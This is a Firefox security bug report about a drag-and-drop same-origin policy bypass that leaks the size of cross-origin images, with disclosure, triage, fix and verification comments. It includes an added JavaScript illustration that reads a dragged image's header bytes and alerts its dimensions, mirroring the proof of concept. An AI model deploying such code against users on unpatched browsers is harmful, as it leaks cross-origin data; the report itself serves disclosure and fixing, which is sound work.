Same-Origin Policy Bypass Image Size Leak in Drag and Drop
Categories: Core :: DOM: Copy & Paste and Drag & Drop, defect, P2
People: Reporter: d4ni31, Assigned: tschuster
References: (Regression)
Details: 4 keywords, Whiteboard: [disclosure deadline 2023-04-29][adv-main110+]
Attachments: 3 files, 1 obsolete file
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Steps to reproduce:
Title
- Same-Origin Policy Bypass Image Size Leak in Drag and Drop
Summary
- A Same-Origin Policy Bypass vulnerability exists in Drag and Drop.
- If this vulnerability is exploited, it is possible to bypass the Same-Origin Policy and leak the size of the image.
Test environment
- Product: Mozilla Firefox 109
- OS: Windows 10 (21H2), macOS Ventura 13.2
Proof-of-Concept
- Please check the attached file!
Reproduce
- Open the server and access the PoC page.
- When you drag and drop an image, the size of the image is leaked.
CREDIT Information
- Dohyun Lee (@l33d0hyun) of SSD Labs
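The mechanism the report describes, as an added illustration (this is not the attached PoC and not Firefox or SSD Labs code): once a page can read the raw bytes of the image the user is dragging, the dimensions fall out of the file header with no decoding at all. imageSizeFromBytes parses PNG, GIF and JPEG headers; reportDroppedImageSize is a drop handler in the shape comment 21 describes (an alert showing the size). That the dragged image's bytes were exposed through dataTransfer.files is an assumption of this example, and the sample headers are hand-built, not real files.

```javascript
// Added illustration for this bug (not the attached PoC, not Firefox code).
// If a page can read the bytes of a dragged image, width/height come straight
// out of the file header. dataTransfer.files as the exposure surface is an
// assumption made for this demo.

function imageSizeFromBytes(bytes) {
  const b = bytes instanceof Uint8Array ? bytes : new Uint8Array(bytes);
  const u16be = (o) => (b[o] << 8) | b[o + 1];
  const u16le = (o) => b[o] | (b[o + 1] << 8);
  const u32be = (o) => ((b[o] << 24) | (b[o + 1] << 16) | (b[o + 2] << 8) | b[o + 3]) >>> 0;

  // PNG: 8-byte signature, then the IHDR chunk: length(4) "IHDR"(4) width(4) height(4)
  if (b.length >= 24 && b[0] === 0x89 && b[1] === 0x50 && b[2] === 0x4e && b[3] === 0x47 &&
      b[12] === 0x49 && b[13] === 0x48 && b[14] === 0x44 && b[15] === 0x52) {
    return { format: "png", width: u32be(16), height: u32be(20) };
  }
  // GIF: "GIF87a"/"GIF89a", then logical screen width/height as little-endian u16
  if (b.length >= 10 && b[0] === 0x47 && b[1] === 0x49 && b[2] === 0x46) {
    return { format: "gif", width: u16le(6), height: u16le(8) };
  }
  // JPEG: walk marker segments until a SOFn frame header (C0..CF minus C4/C8/CC)
  if (b.length >= 4 && b[0] === 0xff && b[1] === 0xd8) {
    let o = 2;
    while (o + 4 <= b.length) {
      if (b[o] !== 0xff) return null;                  // lost marker sync
      const marker = b[o + 1];
      if (marker === 0xff) { o += 1; continue; }       // fill byte
      if (marker === 0x01 || (marker >= 0xd0 && marker <= 0xd8)) { o += 2; continue; } // no payload
      if (marker === 0xd9 || marker === 0xda) return null; // EOI / SOS reached before any SOF
      const len = u16be(o + 2);
      const isSof = marker >= 0xc0 && marker <= 0xcf &&
                    marker !== 0xc4 && marker !== 0xc8 && marker !== 0xcc;
      if (isSof) {
        if (o + 9 > b.length) return null;
        // SOF payload: precision(1) height(2) width(2)
        return { format: "jpeg", width: u16be(o + 7), height: u16be(o + 5) };
      }
      o += 2 + len;
    }
    return null;
  }
  return null;
}

// Constructed sample headers (hand-built for this example, not real files):
// just enough bytes to carry the dimensions, which is all the parser needs.
function constructedSamples() {
  const png = Uint8Array.from([
    0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a,   // PNG signature
    0x00, 0x00, 0x00, 0x0d, 0x49, 0x48, 0x44, 0x52,   // IHDR length + type
    0x00, 0x00, 0x01, 0x00,                           // width  = 256
    0x00, 0x00, 0x00, 0x80,                           // height = 128
  ]);
  const gif = Uint8Array.from([
    0x47, 0x49, 0x46, 0x38, 0x39, 0x61,               // "GIF89a"
    0x20, 0x00, 0x10, 0x00,                           // 32 x 16, little-endian
  ]);
  const jpeg = Uint8Array.from([
    0xff, 0xd8,                                       // SOI
    0xff, 0xe0, 0x00, 0x04, 0x00, 0x00,               // APP0, length 4 (2 payload bytes)
    0xff, 0xc0, 0x00, 0x0b, 0x08,                     // SOF0, length 11, 8-bit precision
    0x00, 0x40, 0x00, 0x30,                           // height 64, width 48
    0x01, 0x01, 0x11, 0x00,                           // one component, padding to declared length
  ]);
  return { png, gif, jpeg };
}

// Drop handler in the shape the thread describes: on drop, read the dragged
// image's bytes and alert its size. Only wired up when a DOM is present.
async function reportDroppedImageSize(event) {
  event.preventDefault();
  const files = event.dataTransfer && event.dataTransfer.files;
  const file = files && files[0];
  if (!file) return null;
  const size = imageSizeFromBytes(await file.arrayBuffer());
  if (size) alert(`${file.name}: ${size.width}x${size.height} (${size.format})`);
  return size;
}

if (typeof document !== "undefined") {
  document.addEventListener("dragover", (e) => e.preventDefault());
  document.addEventListener("drop", reportDroppedImageSize);
}
```

The handler reads whatever bytes the browser hands it, regardless of the image's origin, which is why the fix discussed in comment 4 is on the browser side (not exposing the image data for drags within the same tab) rather than anything the site serving the image could do.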
Comment 1 (Reporter) • 2 years ago
Comment 2 (Reporter) • 2 years ago
Similar case:
CVE-2022-42824: Same-Origin Policy Bypass Image Size Leak in Apple Safari
https://support.apple.com/ko-kr/HT213495
Comment 3 (Reporter) • 2 years ago
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2023-04-29.
Updated • 2 years ago
Comment 4 • 2 years ago
Bug 1812611 should fix this case, we would simply not allow access to the image data when dragging in the same tab.
Comment 5 • 2 years ago
Does that mean this is also a regression from bug 1437126?
Updated • 2 years ago
Comment 6 • 2 years ago
Set release status flags based on info from the regressing bug 1437126
Comment 7 (Reporter) • 2 years ago
This vulnerability works in the same way as the Safari SOP Bypass vulnerabilities I recently reported to Apple, CVE-2022-42824 and CVE-2022-46698.
There was no mention of Firefox, but the PoC (CVE-2022-42824, CVE-2022-46698) for it has been released to some people, so a quick patch may be needed.
+ crbug.com/1264873 has a very similar PoC.
- Please set the sec-level and severity.
Updated • 2 years ago
Comment 8 • 2 years ago
We'll look at this bug later today in our security triage meeting and assign a rating, hopefully.
Updated • 2 years ago
Comment 9 • 2 years ago
The bug is marked as tracked for firefox110 (beta) and tracked for firefox111 (nightly). We have limited time to fix this, the soft freeze is in 7 days. However, the bug still isn't assigned.
:hsinyi, could you please find an assignee for this tracked bug? Given that it is a regression and we know the cause, we could also simply backout the regressor. If you disagree with the tracking decision, please talk with the release managers.
For more information, please visit auto_nag documentation.
Comment 10 • 2 years ago
Tom, could you mark this bug as fixed if it was indeed entirely fixed by bug 1812611? Thanks.
Updated • 2 years ago
Comment 11 (Assignee) • 2 years ago
This is indeed entirely fixed by disabling the feature, as done in bug 1812611.
Comment 13 • 2 years ago
Please stop need-infoing me. Other people will look at this.
Updated • 2 years ago
Comment 14 • 2 years ago
(In reply to DoHyun Lee from comment #12)
> Can I get a CVE ID?

CVEs are typically assigned closer to release of the versions where fixes are shipped. If you are wondering about bug bounties, the bug bounty committee typically meets once a week to make decisions about those. This bug will be updated when either of those things happens.
Updated • 2 years ago
Comment 15 • 2 years ago
Comment 16 (Reporter) • 2 years ago
CREDIT Information,
Dohyun Lee (@l33d0hyun) of SSD Labs
Thanks!
Updated • 2 years ago
Comment 17 (Reporter) • 2 years ago
(In reply to DoHyun Lee from comment #16)
> CREDIT Information,
> Dohyun Lee (@l33d0hyun) of SSD Labs
> Thanks!

Please check comment 16!
Comment 18 • 2 years ago
Comment 20 (Reporter) • 2 years ago
Thank you :)
Updated • 2 years ago
Comment 21 • 2 years ago
Reproduced the issue with Firefox 111.0a1 (2023-01-29) on Windows 10 x64. Loaded the attached test case inside a simple Python server and dragged an image, which resulted in showing the image size in an alert box.
The image size alert box is no longer displayed when dragging the images from the attached test case with Firefox 110.0.1, 111.0b8 and 112.0a1 (2023-03-05) on Windows 10 x64, macOS 12 and Ubuntu 20.04.
Just to be extra safe, is the above verification enough? I am not sure if I should look for anything else in order to verify this issue. Thank you in advance!
Comment 22 (Assignee) • 2 years ago
Thanks Alexandru!

> Just to be extra safe, is the above verification enough? I am not sure if I should look for anything else in order to verify this issue. Thank you in advance!

That is good enough. I had previously verified the fix on Nightly myself as well.
Comment 23 • 2 years ago
(In reply to Tom Schuster (MoCo) from comment #22)
> Thanks Alexandru!
>
> > Just to be extra safe, is the above verification enough? I am not sure if I should look for anything else in order to verify this issue. Thank you in advance!
>
> That is good enough. I had previously verified the fix on Nightly myself as well.

Thank you!
Closing per comment 21 and comment 22.
Updated • 1 year ago
Updated • 6 months ago